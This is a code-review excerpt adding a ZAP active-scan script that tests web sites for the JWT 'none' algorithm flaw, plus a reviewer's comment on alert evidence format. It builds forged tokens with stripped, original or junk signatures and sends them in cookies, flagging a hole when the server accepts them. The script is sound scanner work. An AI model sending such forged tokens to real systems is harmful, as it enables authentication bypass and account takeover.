active/JWT None Exploit.js

```diff
@@ -0,0 +1,138 @@
+	
+	// Try a series of different JWT formats
+	return [
+		header + "." + seperated[1] + ".",					// no hash
+		header + "." + seperated[1] + "." + seperated[2],		// original (but incorrect) hash
+		header + "." + seperated[1] + ".\\(•_•)/",			// junk hash
+		header + "." + seperated[1] + ".XCjigKJf4oCiKS8=",	// junk (but b64 encoded) hash
+		seperated[0] + "." + seperated[1] + "."				// old header but no hash
+	]
+}
+
+// This method is called for every node on the site
+// ActiveScan as, HttpMessage msg
+function scanNode(as, msg) {
+	print("Scanning " + msg.getRequestHeader().getURI().toString())
+
+	// Extract request cookies and detect if using JWT
+	var cookies = msg.getRequestHeader().getHttpCookies()
+	var jwt_cookies = []
+	for (var i = 0; i < cookies.length; i++) {
+		var cookie = cookies[i]
+		if (is_jwt(cookie.getValue()))
+			jwt_cookies.push(cookie)
+	}
+
+	if (jwt_cookies.length == 0)
+		return
+	if (jwt_cookies.length > 1)
+		print("Multiple cookies using JWT found but not yet supported")
+
+	// Default to the first cookie found that uses JWT
+	var target_cookie = jwt_cookies[0]
+
+	// Send a safe request (with original cookie) to see what a correct response looks like
+	var msg_safe = msg.cloneRequest()
+	msg_safe.setCookies([target_cookie])
+	as.sendAndReceive(msg_safe)
+
+	// Send a completely mangled request to see if the page actually looks at the cookie
+	var msg_bad = msg.cloneRequest()
+	msg_bad.setCookies([new Cookie(target_cookie.getName(), "!@#$%^&*()")])
+	as.sendAndReceive(msg_bad)
+
+	var safe_body = msg_safe.getResponseBody()	
+	var bad_body = msg_bad.getResponseBody()
+	
+	// If the mangled cookie gives the same response as the correct cookie, we can assume
+	// that the page does not care what we send in that field and that there is not an exploit
+	if (safe_body.equals(bad_body))
+		return
+
+	var payloads = build_payloads(target_cookie.getValue())
+
+	for (var i = 0; i < payloads.length; i++) {
+		var payload = payloads[i]
+		var cookie_payload = new Cookie(target_cookie.getName(), payload)
+		var msg_loaded = msg.cloneRequest()
+
+		msg_loaded.setCookies([cookie_payload])
+		as.sendAndReceive(msg_loaded)
+
+		var loaded_body = msg_loaded.getResponseBody()
+		
+		// If the body of the request sent with the none algorithm is the same as the body of the request
+		// sent with the default algorithm, we know that the server is parsing the JWT instead of throwing
+		// some form of server error. We can assume (in this case) that the server is parsing the none
+		// algorithm and ignoring the hash--which is a vulnerability.
+		if (loaded_body.equals(safe_body))
+			raise_alert(msg_loaded, target_cookie, payload, as)
+	}
+}
+
+function raise_alert(msg, cookie, payload, as) {
+	print("Vulnerability found, sending alert")
+	as.raiseAlert(
+		RISK, CONFIDENCE, TITLE, DESCRIPTION,
+		msg.getRequestHeader().getURI().toString(), "", "", REFERENCE,
+		SOLUTION, "cookie:" + cookie.getName() + ", payload:" + payload,
```

Comment:
Ideally the evidence should match the contents of the message (e.g. `Cookie: X=A.B.\(•_•)/` without the comma and "payload:").